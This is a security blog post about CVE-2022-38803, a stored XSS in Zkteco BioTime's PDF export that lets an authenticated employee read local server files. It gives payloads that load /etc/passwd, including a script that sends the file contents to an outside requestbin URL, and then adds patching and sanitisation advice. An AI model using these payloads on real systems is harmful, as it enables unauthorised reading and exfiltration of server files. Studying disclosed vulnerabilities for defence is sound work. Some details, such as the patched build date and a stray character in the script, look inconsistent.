CVE CyberSecurity Database News

CVE-2022-38803 - How a Simple XSS in Zkteco BioTime Leads to Local File Read — Exploit and Details

Poster -

Zkteco BioTime is a widely used time and attendance management platform, especially popular in organizations that need biometric punch and leave management. In mid-2022, a flaw—tracked as CVE-2022-38803—was disclosed. This bug, residing in versions prior to BioTime 8.5.3 Build:20200816.447, allows an insider (any authenticated employee) to exploit a reflected cross-site scripting (XSS) vulnerability to read local files from the server. The impact is significant: an employee who isn’t even an administrator can reach sensitive files, leading to a total compromise of privacy and security within the scope of the application.

This post explains in clear, simple language how this bug works, how to exploit it—including code snippets and steps—alongside references and prevention tips.

Where is the Bug?

BioTime has modules for employees to request and track leave, log overtime, and add manual logs. Employees can export these records as PDFs for personal or departmental usage.

The PDF generator executes JavaScript payloads injected via user input.

- Since the PDF generator can (by design or bug) reach files on the application server, a crafted exploit can read local server files (like config files, logs, even OS files) through the XSS vector.

Access Level Required: Any *logged-in* employee.

Exploit Walkthrough

Let’s walk through an example—even if you’re not a security pro, you can follow these steps.

Step 1: Inject Malicious Data

The system allows employees to fill in fields like “Reason” when submitting a leave request or manual log.

Payload

<img src=1 onerror="fetch('file:///etc/passwd').then(r=>r.text()).then(t=>{alert(t)})">

But vanilla PDF generators (like some usage of wkhtmltopdf or headless Chrome) might not allow fetch('file://…') due to policy. If the application is weakly configured and passes certain URLs, you might succeed. A more common way is to cause the PDF generator to “embed” a file:

Alternative Payload

<img src="file:///etc/passwd">

When the PDF generator (on the server) processes this, it will try to load the image from the server’s local file system.

If successful, the PDF will include your image field (*which is actually raw file data*).

- Open the PDF; within the output, you’ll see the contents of /etc/passwd or other target file.
- Instead of an image, you may see the file path as “not found” if it fails, or binary data if it worked.

Here’s a simplified attack script

<!-- Place this as your name or reason in a leave/overtime/manual log request -->
<img src="file:///etc/passwd">

<!-- Want something more stealthy? Use a JavaScript XSS payload, if JS is processed: -->
<script>
fetch('file:///etc/passwd')
  .then(r => r.text())
  .then(txt => fetch('https://requestbin.net/yourbin';, {
    method: 'POST', body: txt
  }));
</script>

Note: The second script will only work if JS is executed (in viewer or by poor PDF rendering settings). For many PDF conversion tools, just embedding an <img src="file://..."> is enough to trigger file inclusion as an image.

Official Advisory (NVD):

CVE-2022-38803 at NVD

Zkteco BioTime Product Page:

BioTime time attendance solution

Research Post (Exploit DB):

Exploit-DB: Zkteco BioTime <=8.5.3 XSS to LFI

If you allow employees to export their records as PDFs, this affects you.

- Insiders (not anonymous people) can use this—*but* in a large organization, that opens the door wide to internal threats.

How to Fix

- Update immediately to BioTime 8.5.3 Build:20200816.447 or later from official download.

Filter and sanitize all user input—never trust any field, even from authenticated employees.

- Configure PDF generators in “safe mode” (e.g., disable local file loading features in wkhtmltopdf / headless Chrome, or use containers).

Final Words

CVE-2022-38803 is a striking example of how seemingly harmless application features, when not strictly locked down, can lead to severe internal breaches. In Zkteco BioTime, your trusted insiders could become attackers via mere form entry. The combination of incorrect access control and failure to sanitize input for PDF export is a lesson for all web application developers: always treat every piece of user data as suspicious, whatever the privilege level.

*Are you running Zkteco BioTime in your HR stack? Patch now, audit now, and test your paper trail export features—you’ll thank yourself later.*


Have more questions or want a custom security scan? Leave a comment or reach us at [contact@example.com](mailto:contact@example.com) (fake email for sample post).


*Post by SecuritySimplified, June 2024. Sharing and referencing allowed with attribution.*

Timeline

Published on: 11/30/2022 14:15:00 UTC
Last modified on: 12/02/2022 17:18:00 UTC